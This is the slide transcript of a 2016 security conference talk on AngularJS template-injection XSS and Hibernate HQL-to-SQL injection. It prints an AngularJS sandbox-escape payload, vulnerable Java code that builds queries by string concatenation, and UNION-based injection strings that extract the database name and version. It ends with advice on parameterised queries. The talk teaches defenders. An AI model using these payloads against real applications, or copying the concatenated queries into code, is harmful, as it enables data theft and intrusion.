Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Advanced XSS and Injection Attacks

Casey Dunham
May 21, 2016
Programming
1
1.2k

Advanced XSS and Injection Attacks

Presentation on XSS in AngularJS and Hibernate SQL Injection given at Security BSides Boston 2016.

Links to the demo application:

https://github.com/caseydunham/angularjs-sandbox
https://github.com/caseydunham/hibernate-sandbox

Casey Dunham

May 21, 2016
Tweet

More Decks by Casey Dunham

See All by Casey Dunham
Hibernate Blind SQLi MISC 2016
caseydunham
0
500
Using OSINT to Attack Web Applications
caseydunham
2
240

Other Decks in Programming

See All in Programming
CSC509 Lecture 11
javiergs
PRO
0
180
Ethereum_.pdf
nekomatu
0
470
cmp.Or に感動した
otakakot
3
260
Compose 1.7のTextFieldはPOBox Plusで日本語変換できない
tomoya0x00
0
210
Contemporary Test Cases
maaretp
0
140
最新TCAキャッチアップ
0si43
0
220
React CompilerとFine Grained Reactivityと宣言的UIのこれから / The next chapter of declarative UI
ssssota
5
740
Hotwire or React? ~アフタートーク・本編に含めなかった話~ / Hotwire or React? after talk
harunatsujita
1
120
WebフロントエンドにおけるGraphQL(あるいはバックエンドのAPI)との向き合い方 / #241106_plk_frontend
izumin5210
4
1.4k
Less waste, more joy, and a lot more green: How Quarkus makes Java better
hollycummins
0
100
3rd party scriptでもReactを使いたい! Preact + Reactのハイブリッド開発
righttouch
PRO
1
610
3 Effective Rules for Using Signals in Angular
manfredsteyer
PRO
0
110

Featured

See All Featured
A Modern Web Designer's Workflow
chriscoyier
693
190k
The Cult of Friendly URLs
andyhume
78
6k
What's new in Ruby 2.0
geeforr
343
31k
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
Product Roadmaps are Hard
iamctodd
PRO
49
11k
For a Future-Friendly Web
brad_frost
175
9.4k
A Philosophy of Restraint
colly
203
16k
Designing Experiences People Love
moore
138
23k
Why You Should Never Use an ORM
jnunemaker
PRO
54
9.1k
Facilitating Awesome Meetings
lara
50
6.1k
Imperfection Machines: The Place of Print at Facebook
scottboms
265
13k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
8
910

Transcript

  1. Advanced XSS and Injection Attacks

  2. Agenda • Introduction • AngularJS Expressions • AngularJS XSS •

    HQL SQLi • Prevention • Q + A

  3. Introduction • Casey Dunham • Security Consultant for GuidePoint Security

    • Application Security • Code Reviews • Assessments • OWASP Maine • DC207 • TOOOL @CaseyDunham @GuidePointSec

  4. AngularJS Expressions

  5. None

  6. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong class="price">{{ product.price | currency }}</strong> <button type="button" ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  7. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  8. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  9. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  10. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  11. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  12. •Evaluated against a scope object •Evaluation is forgiving to undefined

    and null •Filters can be used to format data before displaying it •No Control Flow Statements •No Function Declarations •No RegExp Creation With Literal Notation •No Object Creation With New Operator •No Bitwise, Comma, And Void Operators Versus JavaScript Expressions

  13. AngularJS XSS

  14. • Gareth Heyes (PortSwigger) • XSS without HTML: Client-Side Template

    Injection with AngularJS • http://blog.portswigger.net/2016/01/xss-without- html-client-side-template.html Prior Research

  15. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }} Sandbox Escape

  16. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  17. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  18. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  19. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  20. DEMO

  21. Hibernate Overview

  22. • Mikhail Egorov / Sergey Soldatov • ORM2Pwn: Exploiting Injections

    in hibernate ORM • Zeronights 0x05 • New Methods for Exploiting ORM Injections in Java Applications • HITB 2016 (Later this May) Prior Research

  23. • Renaud Dubourguais • HQL : Hyperinsane Query Language •

    Safety Symposium on Information and Communication Technologies (SSTIC) 2015

  24. “Hibernate ORM (Hibernate in short) is an object-relational mapping framework

    for the Java language. It provides a framework for mapping an object-oriented domain model to a relational database.” - Wikipedia

  25. “Hibernate's primary feature is mapping from Java classes to database

    tables; and mapping from Java data types to SQL data types.” - Wikipedia
  26. None

  27. public class Customer { private Long id; private String name;

    private String accountId; public Long getId() { return id; } public void setId(Long id) { this.id = id; } … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

  28. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  29. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  30. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  31. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  32. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  33. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  34. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  35. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  36. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  37. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  38. @Entity @Table(name=“customer”) public class Customer { @Id @GeneratedValue( strategy=GenerationType.IDENTITY )

    private Long id; @Column( name=“name”, nullable=false ) private String name; @Column( name=“account_id”, nullable=false ) private String accountId; … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

  39. Exploiting HQL Queries

  40. • Similar to SQL • Fully Object Oriented • Uses

    mapped objects and their properties • More limited than SQL Hibernate Query Language

  41. from Customer c where c.accountId = ‘acme_123’ Mapped Object Object

    Property Object Alias

  42. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }

  43. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }
  44. None
  45. None

  46. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + query + “%'";

  47. Let’s Fix Our Injection String query = "' or 1=1

    or ''='"; String hql = "from Customer c where c.name like '%" + query + “%'";

  48. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + "' or 1=1 or ''='" + "%'";

  49. Success!

  50. • Enumerate other columns (properties)? • Access other mapped objects?

    So Now What?

  51. Screw that and let’s just get to the fun stuff.

  52. Blind SQLi

  53. HQL Injection SQL Injection

  54. Escaping HQL • In HQL the \ is a valid

    character • In HQL to escape a ' we use ‘' • Can combine these to pass along our SQL Injection through HQL
  55. None

  56. Success! • We can now continue along with a normal

    SQL Injection • But… • SQL needs to be Valid • HQL needs to be Valid as well

  57. Here’s where it gets tricky

  58. String hql = "from Customer c where c.name like '%"

    + query + "%'"; Injection Here

  59. http://localhost/search?q=test

  60. q=test' and 1='1

  61. None

  62. q=test' and '1\''=1 -- '='1

  63. q=test' and '1\''=1 union select 1,database(),3-- '='1

  64. None

  65. q=test' and '1\''=1 union select 1,database(),version()— '='1

  66. w00t!

  67. select customer0_.id as id1_0_, customer0_.account_id as account_2_0_, customer0_.name as name3_0_

    from customers customer0_ where ( customer0_.name like '%test' ) and '1\''=1 union select 1,database(),version()— '='1%'

  68. Prevention

  69. Prevention is the same as all SQL Injection

  70. Don’t use String Concatenation To Build Queries!!

  71. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  72. • Look for calls to • createQuery • createSQLQuery •

    All take HQL strings that could have potential for Injection.

  73. Q + A

  74. Thank You!

  75. @CaseyDunham